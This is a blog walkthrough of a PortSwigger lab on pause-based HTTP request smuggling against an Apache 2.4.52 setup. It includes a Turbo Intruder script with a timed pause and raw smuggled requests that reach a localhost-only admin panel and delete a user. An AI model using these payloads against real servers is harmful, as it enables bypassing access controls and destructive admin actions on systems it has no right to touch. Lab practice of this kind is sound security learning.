Pause desync attack: access to 403 forbidden and admin panel
These attack is part of HTTP REQUEST SMUGGLING.
Hey lovely people its KRiPPto99 back again with another blog and today we are going to learn about attack which is part of http request smuggling
Lets Suppose There are two server frontend and backward server whenever we send request it goes through frontend server to backend server whenever backend server Receives the request, it send back response to frontend it complete the cycle, therefore end the connection
In http request what we do is in post request we add get request and try to smuggle and try to fool it, we send half request in backend through frontend we just sent header request and not body request just half request send to backend, backend will wait for request and until time out there always limits in server and after that time being it response to frontend server to complete the connection , now we send another half request using get now it will act as new request and send response to frontend server to complete cycle
Lets give a try in practical check out in this Lab
In step1: lets quickly login and capture the request send to repeater we can notice there is using Apache 2.4.52 version is vulnerable to pause-based CL.O attack on endpoints that trigger server-level redirects
step2: we will add /resources/ here are notice its redirecting to /resources/
step3: Now right click the request and select extentions > turbo intruder > send to turbo intruder (we you have not able to see this means you need to install )
step4: Now in turbo intruder change request to a post request (right-click and select Change request method).
step5: Now we need remove extras and change the connection header to keep-alive and add
GET /admin/ HTTP/1.1 Host: your lab-id as below in picture
and this code
def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=1, requestsPerConnection=500, pipeline=False ) engine.queue(target.req, pauseMarker=['\r\n\r\n'], pauseTime=61000) engine.queue(target.req) def handleResponse(req, interesting): table.add(req)
step6: shoot on attack and wait for 61 sec as we set on now look The first entry is the POST /resources request, which triggered a redirect to /resources/
step7: we just need to change host to localhost for admin panel and launch the attack and wait for 61 sec
step8: here we go we just need to check for CSRF token
step9: halt the reconfigure and do changes like this below
POST /resources HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Cookie: session=YOUR-SESSION-COOKIE Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: CORRECT POST /admin/delete/ HTTP/1.1 Host: localhost Content-Type: x-www-form-urlencoded Content-Length: CORRECT csrf=YOUR-CSRF-TOKEN&username=carlos
add your CSRF token
step10: attack!!!!!!! and wait for 61 sec and congrats lab is solved…
